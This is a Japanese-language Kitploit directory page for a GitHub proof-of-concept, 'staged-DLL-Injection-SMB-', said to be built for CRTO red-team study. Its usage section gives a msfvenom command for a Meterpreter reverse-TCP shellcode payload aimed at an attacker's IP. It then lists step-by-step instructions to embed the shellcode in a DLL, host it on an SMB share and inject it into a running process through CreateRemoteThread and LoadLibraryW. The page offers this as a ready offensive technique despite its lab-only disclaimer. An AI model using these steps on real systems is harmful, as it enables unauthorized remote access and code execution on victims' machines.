Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
staged-DLL-Injection-SMB- — Win32 APIを使用してCで構築されたステージ型DLLインジェクションの概念実証(PoC) — レッドチーム認定試験(CRTO)の学習用に隔離されたラボ環境で開発されました。 | Kitploit
ツール/GitHubGitHub/kasturixbm5/staged-dll-injection-smb-
エクスプロイトシェルコードペネトレーションテスト学習と教育レッドチーミングシェルコード生成ペイロード開発ラボと実践
GitHub

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
kasturixbm5/staged-dll-injection-smb-

staged-DLL-Injection-SMB-

Win32 APIを使用してCで構築されたステージ型DLLインジェクションの概念実証(PoC) — レッドチーム認定試験(CRTO)の学習用に隔離されたラボ環境で開発されました。

リポジトリを見る
4282ヶ月前Kitploit レビュー済み

staged-DLL-Injection

Win32 API を使用して C で構築されたステージ型 DLL インジェクションの概念実証 (PoC) — レッドチーム認定試験 (CRTO) の学習のために隔離されたラボ環境で開発されました。

⚠️ 免責事項: このプロジェクトは、攻撃的セキュリティ研究および認定試験 (CRTO) の一環として、教育目的で隔離されたラボ環境でのみ開発されました。明示的な書面による許可なしにいかなるシステムに対しても使用することを意図したものではありません。無断使用は違法かつ非倫理的です。

概要

レッドチーム認定試験の学習の一環として構築された、Windows 上でのステージ型 DLL インジェクションの概念実証 (PoC) 実装です。このプロジェクトは、ステージャーがネイティブ Win32 API を使用してターゲットプロセスに悪意のある DLL をリモートで読み込む方法を示しています。 内部ネットワーク内で SMB トラフィックを許可する AD 環境で最も効果的に動作します。インターネット経由での使用は推奨されません。

使用方法

root@kitploit:~
1. Build a shellcode with msfvenom
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<IP> LPORT=<port> -f raw -o /directory/payload.bin
2. Obtain the raw shellcode and convert into a C array
xxd -i payload.bin > payload.h
3. Copy the shellcode, and paste it under unsigned char payload_bin[] {xxxxx} array in maindll.c
4. Modify the phc.c to point the address to your IP in dllPath[]
5. Compile phc.c into .exe, and compile maindll.c into .dll file
6. Host the smb server, and paste the maindll.dll
7. Set up Listener
8. Open Notepad.exe and find the PID
9. Run phc.exe <PID>

仕組み

ステージャー (phc.c)

  • ターゲットプロセスの PID をコマンドライン引数として受け取ります
  • OpenProcess を使用してターゲットプロセスのハンドルを開きます
  • VirtualAlloc を使用してターゲットプロセス内にメモリを割り当てます
  • Kernel32 から LoadLibraryW のアドレスを取得します
  • CreateRemoteThread を使用して LoadLibraryW を呼び出すリモートスレッドを生成し、リモート SMB 共有から DLL を読み込みます

DLL (maindll.dll)

  • 埋め込みシェルコードペイロードを含みます
  • DLL_PROCESS_ATTACH 時に DllMain が自動的に実行されます
  • VirtualAlloc を使用して実行可能メモリを割り当てます
  • シェルコードをメモリにコピーし、CreateThread を使用して実行します

攻撃フロー

phc.exe → ターゲットプロセスを開く → ターゲットプロセス内にメモリを割り当てる → LoadLibraryW を介して SMB 共有から maindll.dll を読み込む → DllMain が実行される → ターゲットプロセス内でシェルコードが実行される

実証されるテクニック

  • CreateRemoteThread + LoadLibraryW によるリモート DLL インジェクション
  • C によるシェルコードの埋め込みと実行
  • DllMain による DLL エントリポイントの悪用
  • SMB を介したリモートペイロードのステージング

使用技術

  • C
  • Win32 API
  • msfvenom
  • Sliver C2

環境

隔離されたラボ環境の Windows 10 でテスト済みです。C2 リスナーは Kali Linux 上でホストされています。

ツールをダウンロード